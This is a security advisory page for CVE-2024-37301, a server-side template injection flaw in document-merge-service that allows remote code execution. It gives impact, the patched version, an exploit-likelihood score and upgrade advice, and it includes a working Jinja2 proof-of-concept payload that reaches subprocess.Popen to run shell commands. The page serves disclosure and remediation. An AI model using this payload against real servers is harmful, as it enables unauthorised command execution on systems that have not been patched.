CVE-2024-37301

Description

### Impact _What kind of vulnerability is it? Who is impacted?_ A remote code execution (RCE) via server-side template injection (SSTI) allows for user supplied code to be executed in the server's context where it is executed as the document-merge-server user with the UID 901 thus giving an attacker considerable control over the container. ### Patches _Has the problem been patched? What versions should users upgrade to?_ It has been patched in v6.5.2 ### References _Are there any links users can visit to find out more?_ - https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti ### POC Add the following to a document, upload and render it: ```jinja2 {% if PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202] %} ls -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("ls -a", shell=True, stdout=-1).communicate()[0].strip() }} whoami: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("whoami", shell=True, stdout=-1).communicate()[0].strip() }} uname -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("uname -a", shell=True, stdout=-1).communicate()[0].strip() }} {% endif %} ``` The index might be different, so to debug this first render a template with `{{ PLACEHOLDER.__class__.__mro__[1].__subclasses__() }}` and then get the index of `subprocess.Popen` and replace 202 with that. ![image](https://github.com/adfinis/document-merge-service/assets/110528300/0a1dfcff-2eba-40f1-af9c-08c8ec2bc0a1)

How to fix CVE-2024-37301

To remediate CVE-2024-37301, upgrade the affected package to a fixed version below.

—upgrade to 6.5.2 or later

Is CVE-2024-37301 being exploited?

Moderate — EPSS is 5.6%. Track this CVE but it's not at the top of the prioritisation list.

Affected packages (1)

from 0, < 6.5.2

Description

How to fix CVE-2024-37301

Is CVE-2024-37301 being exploited?

Affected packages (1)

CVSS scores

References (4)